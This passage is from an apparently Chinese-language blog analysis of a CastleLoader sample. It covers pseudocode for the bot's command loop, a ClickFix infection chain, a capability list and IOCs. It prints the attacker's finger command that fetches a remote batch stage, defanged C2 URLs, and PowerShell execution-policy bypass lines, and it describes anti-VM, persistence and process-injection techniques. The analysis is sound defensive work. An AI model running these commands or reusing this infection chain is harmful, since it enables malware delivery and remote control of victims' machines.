<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">main</span>():</span><br><span class="line">    init_heap_and_api_resolver()</span><br><span class="line">    check_locale_geofence()</span><br><span class="line">    parse_initial_config()</span><br><span class="line">    <span class="keyword">if</span> config.enable_worker_thread: CreateThread(worker_beacon_thread)</span><br><span class="line">    <span class="keyword">if</span> config.enable_vm_check: check_hypervisor_vendor_and_abort()</span><br><span class="line">    <span class="keyword">if</span> config.enable_file_or_persistence: prepare_path_or_dropper()</span><br><span class="line">    <span class="keyword">if</span> config.enable_shell_task: execute_local_command()</span><br><span class="line">    command_loop():</span><br><span class="line">        request = build_GET_or_POST()</span><br><span class="line">        response = http_send(request)</span><br><span class="line">        packet = parse_ContainerField(response)</span><br><span class="line">        decrypted = chacha_decrypt(packet.blob)</span><br><span class="line">        dispatch_command(decrypted)</span><br></pre></td></tr></table></figure>

<p>文字逻辑大致是：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">1. COM 初始化</span><br><span class="line">2. COM 安全初始化</span><br><span class="line">3. 区域 / 语言 / marker 检查</span><br><span class="line">4. 解析配置</span><br><span class="line">5. 创建互斥体，防止重复运行</span><br><span class="line">6. 拉取 C2 配置 / 任务包</span><br><span class="line">7. 根据 C2 flag：</span><br><span class="line">   - 启动 worker thread</span><br><span class="line">   - 执行 anti-VM 检查</span><br><span class="line">   - 在 Common AppData 下检查/创建 marker 文件</span><br><span class="line">   - 执行本地命令逻辑</span><br><span class="line">8. 进入 command dispatcher</span><br><span class="line">9. 必要时等待 worker thread</span><br><span class="line">10. CoUninitialize</span><br><span class="line">11. ExitProcess</span><br></pre></td></tr></table></figure>

<p>因此可以推断出这个内层载荷的作用是与远端C2服务器通信并动态获取任务，真正要执行的任务均由远端C2服务器下发，推测这是一个泛用的自动化 bot &#x2F; task runner，后续进一步的检测将其归类为<code>CastleLoader</code>。</p>
<h2 id="5-样本整体感染链路"><a href="#5-样本整体感染链路" class="headerlink" title="5. 样本整体感染链路"></a>5. 样本整体感染链路</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">1. fake CAPTCHA / ClickFix 页面</span><br><span class="line">   ↓</span><br><span class="line">2. 剪贴板写入 cmd payload</span><br><span class="line">   ↓</span><br><span class="line">3. 执行 finger fGOPzWUAOf@homveraahub[.]com</span><br><span class="line">   ↓</span><br><span class="line">4. Finger 返回 batch 二阶段脚本</span><br><span class="line">   ↓</span><br><span class="line">5. 下载 IronPython 3.4.2，伪装为 .pdf 解压</span><br><span class="line">   ↓</span><br><span class="line">6. 运行重命名后的 ipyw32.exe</span><br><span class="line">   ↓</span><br><span class="line">7. Python 解密并执行 stage3 payload</span><br><span class="line">   ↓</span><br><span class="line">8. stage3 释放 x86 shellcode</span><br><span class="line">   ↓</span><br><span class="line">9. shellcode 请求 noidoret[.]com/.../callback1</span><br><span class="line">   ↓</span><br><span class="line">10. callback1.raw：RC4 解密</span><br><span class="line">   ↓</span><br><span class="line">11. XOR 解包得到 loader + PE32</span><br><span class="line">   ↓</span><br><span class="line">12. 反射加载 PE32</span><br><span class="line">   ↓</span><br><span class="line">13. CastleLoader/Bot 客户端运行，连接 C2 获取任务</span><br></pre></td></tr></table></figure>

<h2 id="6-恶意能力清单"><a href="#6-恶意能力清单" class="headerlink" title="6. 恶意能力清单"></a>6. 恶意能力清单</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br></pre></td><td class="code"><pre><span class="line">[多阶段加载与反射加载]</span><br><span class="line">- fake CAPTCHA 社工诱导命令执行</span><br><span class="line">- Finger 协议拉取二阶段 batch</span><br><span class="line">- 借用合法 IronPython 运行环境</span><br><span class="line">- Python base64 / zlib / utf-32 / 字符替换混淆</span><br><span class="line">- x86 shellcode 内存执行</span><br><span class="line">- callback1.raw RC4 解密</span><br><span class="line">- 二层 XOR 解包</span><br><span class="line">- 内嵌 PE32 反射加载</span><br><span class="line">- PE 外层 loader 手动修复 import、relocation、TLS callback 并跳转 OEP</span><br><span class="line"></span><br><span class="line">[C2通信与任务分发]</span><br><span class="line">- HTTP / HTTPS C2 通信</span><br><span class="line">- 连接 noidoret[.]com</span><br><span class="line">- 自定义 ContainerField 二进制协议</span><br><span class="line">- 支持 GET / POST</span><br><span class="line">- 支持响应包解析、字段反序列化</span><br><span class="line">- C2 返回 flag 后控制本地行为</span><br><span class="line"></span><br><span class="line">[加密与数据处理]</span><br><span class="line">- RC4</span><br><span class="line">- ChaCha / Salsa20 风格流加密</span><br><span class="line">- XOR 编码</span><br><span class="line">- HMAC</span><br><span class="line">- CRC32 / Adler32</span><br><span class="line">- 自定义 API hash</span><br><span class="line">- 栈字符串和参数混淆</span><br><span class="line"></span><br><span class="line">[动态API解析]</span><br><span class="line">- 遍历 PEB Ldr 链表</span><br><span class="line">- 通过 DLL 名称 hash 定位模块</span><br><span class="line">- 解析 PE Export Table</span><br><span class="line">- 对导出函数名计算自定义 hash</span><br><span class="line">- 按 hash 动态解析 API</span><br><span class="line">- 支持 forwarded export</span><br><span class="line"></span><br><span class="line">[反分析与环境探测]</span><br><span class="line">- IsDebuggerPresent</span><br><span class="line">- OutputDebugStringW</span><br><span class="line">- CPUID 虚拟机检测</span><br><span class="line">- 检查处理器厂商/虚拟化常量</span><br><span class="line">- long sleep</span><br><span class="line">- 异常/SEH 干扰</span><br><span class="line">- WMI 查询安全软件</span><br><span class="line">- 语言 / 区域 geofence</span><br><span class="line">- 通过 WMI 连接 root\SecurityCenter2</span><br><span class="line">- 执行 SELECT * FROM AntivirusProduct</span><br><span class="line">- 枚举本机 AntiVirus 产品 displayName</span><br><span class="line"></span><br><span class="line">[命令执行能力]</span><br><span class="line">- cmd.exe /c</span><br><span class="line">- ShellExecute open</span><br><span class="line">- ShellExecute runas</span><br><span class="line">- PowerShell -ExecutionPolicy Bypass -NoProfile -EncodedCommand</span><br><span class="line">- PowerShell -ExecutionPolicy Bypass -NoProfile -Command</span><br><span class="line">- PowerShell -ExecutionPolicy Bypass -NoProfile -File</span><br><span class="line">- 支持 headless 参数启动某些程序</span><br><span class="line"></span><br><span class="line">[文件落地与文件系统操作]</span><br><span class="line">- 创建目录</span><br><span class="line">- 检查文件属性</span><br><span class="line">- 读文件</span><br><span class="line">- 写文件</span><br><span class="line">- 设置文件时间 SetFileTime</span><br><span class="line">- 枚举目录</span><br><span class="line">- ZIP 解包逻辑</span><br><span class="line">- 创建 marker 文件</span><br><span class="line"></span><br><span class="line">[持久化能力]</span><br><span class="line">- Task Scheduler COM</span><br><span class="line">- CoCreateInstance 创建 ITaskService</span><br><span class="line">- ITaskService::Connect</span><br><span class="line">- 创建 / 管理计划任务</span><br><span class="line"></span><br><span class="line">[后续载荷执行 / 进程注入]</span><br><span class="line">- 创建进程</span><br><span class="line">- 写入远程进程内存</span><br><span class="line">- PE header 解析</span><br><span class="line">- section 映射</span><br><span class="line">- relocation 修复</span><br><span class="line">- 恢复执行</span><br><span class="line">- 具备 process hollowing / PE injection 能力</span><br></pre></td></tr></table></figure>

<hr>
<h2 id="7-IOC"><a href="#7-IOC" class="headerlink" title="7. IOC"></a>7. IOC</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br></pre></td><td class="code"><pre><span class="line">Final carved PE SHA-256:</span><br><span class="line">77fade440644b41fa84b5521858500f8c4a683ea094d9e12f182a812eeea725b</span><br><span class="line"></span><br><span class="line">MD5:</span><br><span class="line">2c71dc0418df45867f5b2b2e69196bda</span><br><span class="line"></span><br><span class="line">SHA-1:</span><br><span class="line">b01150876e843520a604df8b9b16def8f452c265</span><br><span class="line"></span><br><span class="line">Imphash:</span><br><span class="line">87859727be23746ec60b2674e7b69c73</span><br><span class="line"></span><br><span class="line">Authentihash:</span><br><span class="line">2aaa33db414bae774151e925d48a4bb28227ee7bdd5d62805bd2329a771fd8ae</span><br><span class="line"></span><br><span class="line">Rich PE header hash:</span><br><span class="line">af9f3962daf14230ac1aa6643e5ba46f</span><br><span class="line"></span><br><span class="line">File type:</span><br><span class="line">PE32 executable GUI, Intel 80386</span><br><span class="line"></span><br><span class="line">Architecture:</span><br><span class="line">x86 / 32-bit</span><br><span class="line"></span><br><span class="line">File size:</span><br><span class="line">293376 bytes / 286.50 KB</span><br><span class="line"></span><br><span class="line">Compilation timestamp:</span><br><span class="line">2026-04-30 15:01:31 UTC</span><br><span class="line"></span><br><span class="line">Entry Point:</span><br><span class="line">RVA 0x22592</span><br><span class="line"></span><br><span class="line">Sections:</span><br><span class="line">.text</span><br><span class="line">.rdata</span><br><span class="line">.data</span><br><span class="line">.fptable</span><br><span class="line">.rsrc</span><br><span class="line">.reloc</span><br><span class="line"></span><br><span class="line">Imports:</span><br><span class="line">KERNEL32.dll</span><br><span class="line">USER32.dll</span><br><span class="line">ole32.dll</span><br><span class="line">OLEAUT32.dll</span><br><span class="line"></span><br><span class="line">Popular threat label:</span><br><span class="line">trojan.zusy/ahls</span><br><span class="line"></span><br><span class="line">Family labels:</span><br><span class="line">zusy</span><br><span class="line">ahls</span><br><span class="line">castle</span><br><span class="line"></span><br><span class="line">Representative detections:</span><br><span class="line">Elastic: Windows.Trojan.CastleLoader</span><br><span class="line">Microsoft: Trojan:Win32/CastleLoader.MK!MTB</span><br><span class="line">AhnLab-V3: Downloader/Win.Agent.R741707</span><br><span class="line">ESET-NOD32: Win32/Agent.AHLS Trojan</span><br><span class="line">Fortinet: W32/Agent.AHLS!tr</span><br><span class="line">DrWeb: Trojan.PWS.Steam.39135</span><br><span class="line">BitDefender: Gen:Variant.Zusy.597674</span><br><span class="line">GData: Gen:Variant.Zusy.597674</span><br><span class="line">VIPRE: Gen:Variant.Zusy.597674</span><br><span class="line"></span><br><span class="line">Initial Finger stage:</span><br><span class="line">homveraahub[.]com</span><br><span class="line"></span><br><span class="line">Finger query:</span><br><span class="line">fGOPzWUAOf@homveraahub[.]com</span><br><span class="line"></span><br><span class="line">C2 domain:</span><br><span class="line">noidoret[.]com</span><br><span class="line"></span><br><span class="line">Observed IP:</span><br><span class="line">50.114.167[.]195</span><br><span class="line"></span><br><span class="line">DNS:</span><br><span class="line">8.8.8.8</span><br><span class="line"></span><br><span class="line">Observed / extracted URLs:</span><br><span class="line">hxxps://noidoret[.]com/</span><br><span class="line">hxxps://noidoret[.]com/5</span><br><span class="line">hxxps://noidoret[.]com/6d6d2d17-d270-59c6-8b75-df011af08e58/version1</span><br><span class="line">hxxps://noidoret[.]com/6d6d2d17-d270-59c6-8b75-df011af08e58/callback1</span><br><span class="line">hxxps://noidoret[.]com/f4ba4ea2-6c8c-5060-ae67-259dc376c56f</span><br><span class="line">hxxps://noidoret[.]com/f4ba4ea2-6c8c-5060-ae67-259dc376c56f/32debe66-d0de-51b3-8abc-db555b72fb4a</span><br><span class="line"></span><br><span class="line">%LocalAppData%\IronPython.3.4.2</span><br><span class="line">%LocalAppData%\IronPython.3.4.2.pdf</span><br><span class="line">%LocalAppData%\[random][random][random][random].com</span><br><span class="line">%LocalAppData%\IronPython.3.4.2\net462\[random][random][random].exe</span><br><span class="line"></span><br><span class="line">C:\ProgramData\iwD11Lmhnljrg5EvEBMS2b</span><br><span class="line">C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp</span><br><span class="line"></span><br><span class="line">Sandbox opened / suspicious side-loading paths:</span><br><span class="line">C:\Users\&lt;USER&gt;\Desktop\DPAPI.DLL</span><br><span class="line">C:\Users\&lt;USER&gt;\Desktop\Wldp.dll</span><br><span class="line">C:\Users\&lt;USER&gt;\Desktop\ncrypt.dll</span><br><span class="line"></span><br><span class="line">Mutex / marker:</span><br><span class="line">iwD11Lmhnljrg5EvEBMS2b</span><br><span class="line">\Sessions\1\BaseNamedObjects\iwD11Lmhnljrg5EvEBMS2b</span><br><span class="line"></span><br><span class="line">WMI IOC:</span><br><span class="line">Namespace: root\SecurityCenter2</span><br><span class="line">Query: SELECT * FROM AntivirusProduct</span><br><span class="line">Process: wmiprvse.exe -secured -Embedding</span><br><span class="line"></span><br><span class="line">command / behavior:</span><br><span class="line">cmd.exe /c</span><br><span class="line">PowerShell -ExecutionPolicy Bypass -NoProfile -EncodedCommand</span><br><span class="line">PowerShell -ExecutionPolicy Bypass -NoProfile -Command</span><br><span class="line">PowerShell -ExecutionPolicy Bypass -NoProfile -File</span><br><span class="line">ShellExecuteW verb: open</span><br><span class="line">ShellExecuteW verb: runas</span><br><span class="line">--headless</span><br><span class="line"></span><br><span class="line">Network TLS / JA3:</span><br><span class="line">JA3:</span><br><span class="line">cbcd1d81f242de31fd683d5acbc70dca</span><br><span class="line">db95a4cb23548a635a1dfebcee9991cb</span><br><span class="line">3c293bdf2a25c07559b560ba86debc77</span><br><span class="line"></span><br><span class="line">Crowdsourced IDS:</span><br><span class="line">ET INFO TLS Handshake Failure</span><br></pre></td></tr></table></figure>

<p>相关样本已上传<a target="_blank" rel="noopener" href="https://www.virustotal.com/gui/file/77fade440644b41fa84b5521858500f8c4a683ea094d9e12f182a812eeea725b">Virus Total</a>，可进行访问查看。</p>
<h2 id="8-总结"><a href="#8-总结" class="headerlink" title="8. 总结"></a>8. 总结</h2><p>该样本属于多阶段 ClickFix 感染链中的 <code>CastleLoader</code>&#x2F;<code>CastleBot</code> 相关通用 Loader&#x2F;Bot。初始阶段通过伪装验证码诱导用户执行剪贴板命令，随后利用 Finger 协议获取远程 batch 脚本，并借助 <code>IronPython</code> 执行后续混淆 Python 载荷。Python 阶段释放 x86 shellcode，连接 <code>noidoret[.]com</code> 下载 callback1 加密 blob。该 blob 经过 RC4 和 XOR 解密后得到内嵌 PE32，外层 loader 对其进行反射加载并跳转执行。最终 PE 具备 C2 通信、动态 API hash 解析、WMI 安全软件枚举、反调试、CPUID 反虚拟机、计划任务持久化、文件落地、命令执行、PowerShell 执行、ZIP 解包、进程注入和后续 payload 执行能力，是全面的通用后续任务加载器。</p>

        
      </div>

         
    </div>
    
     
  </div>
  
    
<nav id="article-nav">
  <a class="article-nav-btn left  disabled "
     >
    <i class="fa-solid fa-angle-left"></i>
    <p class="title-text">
        
    </p>
  </a>
  <a class="article-nav-btn right "
    
      href="/2026/04/08/kalmar_26_linkme/"
      title="KalmarCTF 2026 Reverse-Linkme WriteUp"
     >

    <p class="title-text">
      
        KalmarCTF 2026 Reverse-Linkme WriteUp
        
    </p>
    <i class="fa-solid fa-angle-right"></i>
  </a>
</nav>


  
</article>

 
    </div>
    <div id="footer-wrapper">
      <footer id="footer">
  
  <div id="footer-info" class="inner">
    
    &copy; 2026 Astral Prisma<br>
    Powered by <a href="https://hexo.io/" target="_blank">Hexo</a> & Theme <a target="_blank" rel="noopener" href="https://github.com/saicaca/hexo-theme-vivia">Vivia</a>
  </div>
</footer>

    </div>
    <div class="back-to-top-wrapper">
    <button id="back-to-top-btn" class="back-to-top-btn hide" onclick="topFunction()">
        <i class="fa-solid fa-angle-up"></i>
    </button>
</div>

<script>
    function topFunction() {
        window.scroll({ top: 0, behavior: 'smooth' });
    }
    let btn = document.getElementById('back-to-top-btn');
    function scrollFunction() {
        if (document.body.scrollTop > 600 || document.documentElement.scrollTop > 600) {
            btn.classList.remove('hide')
        } else {
            btn.classList.add('hide')
        }
    }
    window.onscroll = function() {
        scrollFunction();
    }
</script>

  </div>
  <script src="/js/light-dark-switch.js"></script>
</body>
</html>
